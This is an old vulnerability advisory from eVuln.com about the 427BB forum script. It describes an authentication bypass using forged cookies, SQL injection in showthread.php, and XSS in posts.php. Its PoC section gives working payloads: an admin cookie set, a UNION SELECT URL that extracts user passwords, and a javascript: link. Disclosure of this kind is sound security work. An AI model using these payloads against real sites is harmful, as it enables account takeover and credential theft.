Cookie Auth Bypass, SQL Injections, XSS in 427BB
Summary
- Vulnerability
- Cookie Auth Bypass, SQL Injections, XSS in 427BB
- Discovered
- 2006.01.07
- Last Update
- 0 n/a
- ID
- EV0018
- CVE
- CVE-2006-0153 CVE-2006-0154 CVE-2006-0155
- Risk Level
- high
- Type
- Multiple Vulnerabilities
- Status
- Unpatched
- Vendor
- n/a
- Vulnerable Software
- 427BB (http://sourceforge.net/projects/fourtwosevenbb)
- Version
- checked: 2.2 and 2.2.1
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in 427BB (http://sourceforge.net/projects/fourtwosevenbb) script.
427BB has multiple vulnerabilities.
1. Authentication bypass using modified cookie values.
Vulnerabe scripts: login.php getvars.php
To authorize any logged-in user forum scripts checks only three cookie values:
- username
- authenticated
- usertype
Forum dont make password comparison.
2. 427BB has Multiple SQL Injection Vulnerabilities.
For example:
Vulnerabe script: showthread.php
Variable $ForumID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code
3. Arbitrary script code insertion is possible when posting a message containing URL.
Vulnerable Script: posts.php
Condition: visitor needs to click this link
PoC/Exploit
1. Authentication bypass using modified cookie values.
No password needed:
Cookie: username=admin;Cookie: authenticated=1;Cookie: usertype=admin;
2. SQL Injection Example.
Need to be logged in as registered user.
http://host/bb427/showthread.php? ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal
3. Arbitrary script code insertion.
Posting new message. Message text:
[url=javascript:alert(xss)]clickme[/url]
Solution.
Solution for "Cookie Auth Bypass, SQL Injections, XSS in 427BB" is not available. Check vendor's website for updates.